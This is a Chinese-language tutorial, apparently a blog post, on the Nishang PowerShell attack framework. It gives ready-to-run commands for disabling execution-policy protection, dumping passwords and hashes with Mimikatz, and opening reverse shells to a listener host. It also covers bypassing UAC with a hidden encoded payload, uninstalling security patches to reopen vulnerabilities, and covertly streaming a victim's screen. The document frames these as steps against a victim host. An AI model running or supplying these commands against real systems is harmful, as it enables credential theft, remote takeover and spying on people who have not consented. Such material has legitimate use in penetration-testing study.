项目下载地址:https://github.com/samratashok/nishang
一、nishang的简单介绍
Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。
nishang下载后的目录列表如下图所示,每个目录对应一个功能模块
二、nishang的简单使用
首先打开powershell
导入模块 nishang
必须导入nishang模块,才可以使用这个工具
Import-Module .\nishang.psm1
初次导入,会有红色字的警告提示,如上图所示,是因为windows官方做的一个安全策略导致
**解决方法:**把执行策略修改一下即可,执行完命令之后按默认选项回车即可
Set-ExecutionPolicy RemoteSigned
再次导入模块 nishang,没有宏色警告了,下图中黄色的警告不用管
**查看nishang模块的所有功能:
Get-Command -Module nishang
得到的命令来自nishang模块
比如:
Check-VN:检测是否是虚拟机版本
Get-Information:获取常规计算机信息
端口扫描
扫描192.168.184.125-192.168.184.130所有存活主机,以及存活主机开放的端口
Invoke-PortScan -StartAddress 192.168.184.125 -EndAddress 192.168.184.130 -ResolveHost -ScanPort
获取计算机密码
加载mimikatz获取计算机密码
Invoke-Mimikatz
如果是简单密码可以直接显示出来,复杂密码显示hash值
注意:
如果报错提示:win10 ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory
需要win10以管理员身份运行powershell即可解决该问题
获取计算机密码hash值
获取账号密码的hash值
Get-PassHashes
反弹shell
Invoke-PowershellTcp -Reverse -IPAddress x.x.x.x -Port xxxx
nc -lvvp xxxx
反弹tcp协议
Invoke-Powershelludp -Reverse -IPAddress x.x.x.x -port xxxx
nc -lup xxxx
反弹udp协议
Invoke-PoshRatHttp -IPAddress x.x.x.x -Port xxxx
反弹http协议
Invoke-PoshRatHttps -IPAddress x.x.x.x -Port xxxx
反弹https协议
加入你已经poweshell控制了对方电脑,需要把会话反弹
首先打开kali监听端口1111
nc -nvlp 1111
反弹shell到192.168.184.145的1111端口
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.184.145 -Port 1111
执行命令后,成功反弹shell如下图所示
BypassUAC提权
假设已经将nishang下载到受害主机接下来需要进行UAC提权
使用sysprep方法和默认的Payload执行
Invoke-PsUACme -Verbose
打开受害者主机的powershell,执行命令:Invoke-PsUACme
,执行成功后会弹窗一个窗口,
窗口是超级管理员权限,可以添加账号
//使用oobe方法和默认的Payload执行
Invoke-PsUACme -method oobe -Verbose
//使用-Payload参数可以自行指定要执行的Payload
Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e YourEncodedPayload"
删除补丁
Remove-Update KB4534132
比如删除KB2534111补丁包,如下图所示。
删除补丁包之后服务器会出现漏洞,可根据漏洞进行利用
屏幕监控
靶机:Show-TargetScreen -Reverse -IPAddress x.x.x.x -Port xxxx
攻击机:netcat -nlvp xxxx | netcat -nlvp yyyy
URL访间攻击机 IP: yyyy
比如在靶机上执行命令:
Show-TargetScreen -Reverse -IPAddress 192.168.184.145 -Port 1111
在kali上执行监听命令,并且将监听到的1111端口的数据转发到9999端口上去
在kali浏览器上输入:127.0.0.1:9999 可以实时监控靶机电脑屏幕
除了以上示例之外,还可以及逆行弱口令爆破、内网嗅探、中间人攻击等
参考链接:
https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
更多web安全工具、存在漏洞的网站搭建源码、渗透测试思路,收集整理在知识星球。